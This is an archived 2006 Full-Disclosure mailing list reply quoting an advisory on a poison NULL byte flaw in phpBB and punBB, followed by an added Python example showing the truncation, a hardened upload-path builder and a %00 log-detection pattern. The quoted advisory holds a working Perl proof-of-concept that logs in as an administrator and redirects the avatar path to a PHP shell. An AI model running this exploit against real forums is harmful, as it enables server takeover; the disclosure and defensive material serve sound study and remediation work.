Full Disclosure: Re: ShAnKaR: multiple PHP application poison NULL byte vulnerability


From: Jerome Athias <jerome.athias_at_free.fr>
Date: Tue, 12 Sep 2006 13:58:19 +0200

Hi,

this was also nicely described for ASP by Brett Moore
http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf

(French translation:
https://www.securinfos.info/jerome/DOC/0x00_vs_ASP_File_Uploads_FR.pdf )

Best regards
/JA

3APA3A wrote:
> Author: ShAnKaR
> Title: multiple PHP application poison NULL byte vulnerability
> Applications: phpBB 2.0.21, punBB 1.2.12
> Threat Level: Critical
> Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
>
> The poison NULL byte vulnerability for Perl CGI applications was described
> in [1]. ShAnKaR noted that the same vulnerability also affects various
> PHP applications. Examples of vulnerable applications are phpBB and
> punBB.
>
> The vulnerability can be used to upload or replace arbitrary files on the
> server, e.g. PHP scripts, by adding a "poison NULL" (%00) to the filename.
>
> In the case of phpBB and punBB, the vulnerability can be exploited by changing
> the location of the avatar file and uploading an avatar file with PHP code in
> its EXIF data.
>
> A PoC exploit to change Avatar file location for phpBB:
>
>
>
> #!/usr/bin/perl -w
>
> use HTTP::Cookies;
> use LWP;
> use URI::Escape;
> unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
> my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
> $ua->cookie_jar( HTTP::Cookies->new());
>
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
> my $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> my $res = $ua->request($req);
>
> $res=$ua->get('http://'.$ARGV[0].'/login.php');
> $content=$res->content;
> $content=~ m/true&amp;sid=([^"]+)"/g;
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
> $url='http://'.$ARGV[0].'/login.php';
> $data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
>
> $url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
> $data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
> $req = new HTTP::Request 'POST',$url;
> $req->content_type('application/x-www-form-urlencoded');
> $req->content($data);
> $res = $ua->request($req);
> if($ARGV[4]){
> $content=$res->content;
> print $content;
> }
>
>
> References:
> [1] .rain.forest.puppy, Perl CGI problems, Phrack Magazine Issue 55
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Sep 12 2006
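The quoted advisory describes the mechanism only briefly: an extension or path check runs over the full string, but the C library calls underneath PHP (and Perl) stop at the first NUL byte, so the file system sees a different name than the one that was validated. The following Python is an added illustration written for this archive page, not code from the advisory, from phpBB/punBB, or from the quoted PoC. It emulates the NUL truncation, shows the naive check passing where it should not, and contrasts it with a hardened path builder and a small access-log check. Every name in it (c_string_view, safe_upload_path, flag_nul_requests, the /srv/forum root, the constructed log lines) is hypothetical.

```python
"""Poison NULL byte: why a check on the full string disagrees with the
name the OS actually uses, and how to build upload paths that cannot be
split that way. Added example; no project code is reproduced here."""
import posixpath
import re

# Hypothetical allow-list for an avatar upload feature.
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}


def c_string_view(s: str) -> str:
    """Emulate a C filesystem call: everything from the first NUL on is
    invisible to open()/fopen(), which is what the advisory relies on."""
    return s.split("\0", 1)[0]


def naive_extension_ok(name: str) -> bool:
    """The weak pattern: validate the extension of the *whole* string,
    which is not the string the OS will use if it contains a NUL."""
    return posixpath.splitext(name)[1].lower() in ALLOWED_EXT


class UnsafePath(ValueError):
    """Raised when a candidate path must not be passed to the OS."""


def safe_upload_path(base_dir: str, configured_dir: str,
                     original_name: str, stored_stem: str) -> str:
    """Build the on-disk path for an upload.

    Rejects NUL bytes outright (in the admin-configured directory as well
    as the client filename, since both are attacker-influenceable), takes
    the extension from the basename only, never reuses the client's name,
    and confirms the final path stays under base_dir.
    """
    for label, value in (("configured_dir", configured_dir),
                         ("filename", original_name)):
        if "\0" in value:
            raise UnsafePath(f"NUL byte in {label}")
    ext = posixpath.splitext(posixpath.basename(original_name))[1].lower()
    if ext not in ALLOWED_EXT:
        raise UnsafePath(f"extension {ext!r} not allowed")
    # Server-chosen stem + validated extension; the client name is discarded.
    candidate = posixpath.normpath(
        posixpath.join(base_dir, configured_dir, stored_stem + ext))
    root = posixpath.normpath(base_dir)
    if candidate != root and not candidate.startswith(root + "/"):
        raise UnsafePath("path escapes upload root")
    return candidate


def is_rejected(base_dir: str, configured_dir: str,
                original_name: str, stored_stem: str) -> bool:
    """Convenience wrapper: True when safe_upload_path refuses the input."""
    try:
        safe_upload_path(base_dir, configured_dir, original_name, stored_stem)
    except UnsafePath:
        return True
    return False


# Detection side: an encoded NUL (%00) in a request line is almost never
# legitimate. This only covers parameters that reach the access log (GET
# query strings); POST bodies need application-level logging.
NUL_IN_REQUEST = re.compile(r'"(?:GET|POST|PUT) [^"]*%00', re.IGNORECASE)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Sep/2006:13:58:19 +0200] "GET /forum/index.php HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/Sep/2006:14:02:01 +0200] "GET /forum/profile.php?mode=editprofile HTTP/1.1" 200 310',
    '10.0.0.9 - - [12/Sep/2006:14:02:05 +0200] "GET /forum/download.php?file=report.pdf%00.jpg HTTP/1.1" 200 310',
]


def flag_nul_requests(lines):
    """Return the log lines whose request line carries an encoded NUL."""
    return [line for line in lines if NUL_IN_REQUEST.search(line)]


if __name__ == "__main__":
    tricky = "shell.php\0.jpg"
    print("naive check passes:", naive_extension_ok(tricky))   # True
    print("OS would open:", c_string_view(tricky))             # shell.php
    print(safe_upload_path("/srv/forum", "images/avatars", "me.JPG", "u42"))
    print("rejected:", is_rejected("/srv/forum", "images/avatars/x.php\0", "me.jpg", "u42"))
    for hit in flag_nul_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

The point the emulation makes is that the defect is a check/use mismatch, not a missing check: naive_extension_ok happily accepts "shell.php\0.jpg" while c_string_view shows the name the kernel would receive. Refusing NUL bytes before any path is built, and generating the stored name server-side, removes the attacker's control over what follows the validated extension; the log check is a cheap signal to pair with that fix on systems that cannot be patched immediately.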
